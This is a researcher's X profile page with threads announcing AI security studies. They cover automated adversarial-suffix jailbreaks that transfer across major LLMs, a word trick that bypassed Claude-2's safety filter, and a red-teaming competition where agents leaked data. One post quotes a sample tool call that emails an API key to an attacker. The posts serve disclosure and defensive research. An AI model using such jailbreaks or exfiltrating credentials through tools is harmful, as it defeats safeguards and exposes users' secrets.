Andy Zou (@andyzou_jiaming) / X

Andy Zou

182 posts

Andy Zou

@andyzou_jiaming

PhD student at CMU, working on AI Safety and Security

Berkeley, CA

Joined March 2014

Andy Zou
@andyzou_jiaming
Jul 28, 2023
🚨We found adversarial suffixes that completely circumvent the alignment of open source LLMs. More concerningly, the same prompts transfer to ChatGPT, Claude, Bard, and LLaMA-2…🧵 Website: llm-attacks.org Paper: arxiv.org/abs/2307.15043
1.6M
Andy Zou
@andyzou_jiaming
Jul 29, 2025
We deployed 44 AI agents and offered the internet $170K to attack them. 1.8M attempts, 62K breaches, including data leakage and financial loss. 🚨 Concerningly, the same exploits transfer to live production agents… (example: exfiltrating emails through calendar event) 🧵
525K
Andy Zou
@andyzou_jiaming
Oct 4, 2023
LLMs can hallucinate and lie. They can be jailbroken by weird suffixes. They memorize training data and exhibit biases. 🧠 We shed light on all of these phenomena with a new approach to AI transparency. 🧵 Website: ai-transparency.org Paper: arxiv.org/abs/2310.01405
252K
Andy Zou
@andyzou_jiaming
Jun 8, 2024
No LLM is secure! A year ago, we unveiled the first of many automated jailbreak capable of cracking all major LLMs. 🚨 But there is hope?! We introduce Short Circuiting: the first alignment technique that is adversarially robust. 🧵 📄 Paper: arxiv.org/abs/2406.04313
145K
Andy Zou
@andyzou_jiaming
Oct 4, 2023
Replying to @andyzou_jiaming
In fact, we find LLMs exhibit different brain activity when they express their true beliefs vs. when they lie (see figure).
184K
Andy Zou
@andyzou_jiaming
Jul 29, 2025
Replying to @andyzou_jiaming
Huge thanks to @AISecurityInst , OpenAI, Anthropic, and Google DeepMind for sponsoring, and to UK and US AISI for judging. The competition was held in the @GraySwanAI Arena. This was the largest open red‑teaming study of AI agents to date. Paper:
arxiv.org
Security Challenges in AI Agent Deployment: Insights from a Large...
Recent advances have enabled LLM-powered AI agents to autonomously execute complex tasks by combining language model reasoning with tools, memory, and web access. But can these systems be trusted...
34K
Andy Zou
@andyzou_jiaming
Jul 28, 2023
Replying to @andyzou_jiaming
Claude-2 has an additional layer of safety filter. After we bypassed it with a word trick, the generation model was willing to give us the answer as well.
36K
Andy Zou
@andyzou_jiaming
Jul 29, 2025
Replying to @andyzou_jiaming
The most secure model still had a 1.5% attack success rate (ASR). Implication: without additional mitigations, your AI application can be compromised on the order of minutes.
19K
Andy Zou
@andyzou_jiaming
Jul 29, 2025
Replying to @andyzou_jiaming
Favorite failure: “refuse in text, act in tools.” 😈 Model: “I can’t share credentials.” Then: send_email(to=attacker, body="API_KEY=****") The UI looks safe; the tool layer does the damage.
12K
Andy Zou
@andyzou_jiaming
Jul 28, 2023
Replying to @andyzou_jiaming
Manual jailbreaks are rare, often unreliable as demonstrated by the “sure, here’s” jailbreak (see previous figure). But we find an automated way (GCG) of constructing essentially an infinite number of such jailbreaks with high reliability, even for novel instructions and models.
24K
Andy Zou
@andyzou_jiaming
Jul 29, 2025
Replying to @andyzou_jiaming
The upshot? Prompt‑injection risks appear to be a primary blocker to safe autonomous deployment. Treat AI agents like untrusted code touching live systems.
13K
Andy Zou
@andyzou_jiaming
Dec 7, 2023
Meta: Here's a model we fine-tuned extensively to do exactly one thing (differentiating safe and unsafe content). GCG: Hold my beer...
47K
Andy Zou
@andyzou_jiaming
Jul 29, 2025
Replying to @andyzou_jiaming
Paper: arxiv.org/abs/2507.20526 Try breaking the agents yourself here: app.grayswan.ai/arena/challeng… Blog: app.grayswan.ai/arena/blog/age…
arxiv.org
Security Challenges in AI Agent Deployment: Insights from a Large...
Recent advances have enabled LLM-powered AI agents to autonomously execute complex tasks by combining language model reasoning with tools, memory, and web access. But can these systems be trusted...
11K
Andy Zou
@andyzou_jiaming
Jul 28, 2023
Replying to @andyzou_jiaming
So why did we publish it? Despite the risks, we believe it to be proper to disclose in full. The attacks presented here are simple to implement, have appeared in similar forms before, and ultimately would be discoverable by any dedicated team intent on misusing LLMs.
23K